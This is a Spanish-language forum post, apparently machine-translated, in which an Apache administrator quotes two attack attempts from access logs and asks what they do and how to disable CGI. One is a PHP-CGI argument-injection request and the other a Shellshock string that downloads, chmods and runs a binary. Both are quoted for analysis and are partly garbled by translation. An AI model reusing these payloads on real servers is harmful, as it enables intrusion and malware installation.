He estado monitoreando alguna actividad extraña en los registros de acceso de mi sitio y he notado un par de intentos extraños en el servidor. Me pregunto si alguien ha visto esto antes. Es un servidor Apache 2.4.6.
El primero que me llamó la atención fue
% 63% 67% 69% 2D% 62% 69% 6E /% 7 0% 68% 70?% 2D% 64 +% 61% 6C% 6C% 6F% 77% 5F% 75% 72% 6C% 5F% 69% 6E% 63% 6C% 75% 64% 65% 3D% 6F% 6E +% 2D% 64 +% 73% 61% 66% 65% 5F% 6D% 6F% 64% 65% 3D% 6F% 66% 66 +% 2D% 64 +% 73% 75% 68% 6F% 73% 69% 6E% 2E % 73% 69 % 6D% 75% 6C% 61% 74% 69% 6F% 6E% 3D% 6F% 6E +% 2D% 64 +% 64% 69% 73% 61% 62% 6C% 65% 5F% 66% 75% 6E% 63% 74 % 69% 6F% 6E% 73% 3D% 22% 22 +% 2D% 64 +% 6F% 70% 65% 6E% 5F% 62% 61% 73% 65% 64% 69% 72% 3D% 6E% 6F % 6E% 65 +% 2D% 64 +% 61% 75% 74% 6F% 5F% 70% 72% 65% 70% 65% 6E% 64% 5F% 66% 69% 6C% 65% 3D% 70% 68% 70% 3A % 2F% 2F % 69% 6E% 70% 75% 74 +% 2D% 64 +% 63% 67% 69% 2E% 66% 6F% 72% 63% 65% 5F% 72% 65% 64% 69% 72% 65% 63 % 74% 3D % 30 +% 2D% 64 +% 63% 67% 69% 2E% 72% 65% 64% 69% 72% 65% 63% 74% 5F% 73% 74% 61% 74% 75% 73% 5F% 65 % 6E% 76 % 3D% 30 +% 2D% 64 +% 61% 75% 74% 6F% 5F% 70% 72% 65% 70% 65% 6% 6%% 70% 69% 6%% 70% 69%% 70% 68% % 70% 3A % 2F% 2F% 69% 6E% 70% 75% 74 +% 2D% 6E
Esta es una URL codificada que se decodifica a
cgi-bin /% 7 0hp? -D allow_url_include = on -% 64 safe_mode = off -d suhosin.si mulation = en -d disable_funct ions="" -d open_basedir = none -d auto_prepend_file = php: // entrada -d cgi.force_redirect = 0 -d cgi.redirect_status_env = 0 -d auto_prepend_file = php: // entrada -n
No soy un administrador experimentado, por lo que no estoy completamente seguro de lo que está intentando hacer. Parece que está tratando de inyectar un script CGI en / var / www / cgi-bin que redirige a algún lugar, ¿alguien puede decirme qué está intentando hacer esto?
El otro que noté parece un intento de Shellshock:
"() {:; }; / bin / bash -c \ "rm -rf / tmp / ; echo wget enlace -O / tmp /China.Z-etryX > > /tmp/Run.sh;echo echo Por China.Z > > /tmp/Run.sh;echo chmod 777 /tmp/China.Z-etryX > > /tmp/Run.sh;echo /tmp/China.Z-etryX > > /tmp/Run.sh;echo r m -rf /tmp/Run.sh > > /tmp/Run.sh;chmod 777 /tmp/Run.sh; /tmp/Run.sh \ "" "() {:;} ; / bin / bash -c \ "rm -rf / tmp / ; echo wget enlace -O / tmp / C hina.Z-etryX > > /tmp/Run.sh;echo echo Por China.Z > > /tmp/Run.sh;echo chmod 777 / tmp / China.Z-etryX > > /tmp/Run.sh;echo /tmp/China.Z-etryX > > /tmp/Run.sh;echo rm -rf /tmp/Run.sh > > /tmp/Run.sh;chmod 777 /tmp/Run.sh; /tmp/Run.sh \ "
Mi última pregunta es: ¿hay alguna manera de deshabilitar completamente el módulo CGI para Apache sin volver a compilarlo desde la fuente? Por mi propia lectura, he encontrado que hay un indicador que se puede establecer en el momento de la compilación para deshabilitar completamente este módulo. El servidor aloja una página web estática y ya está, ¿realmente necesito la configuración mínima? ¿Algún consejo?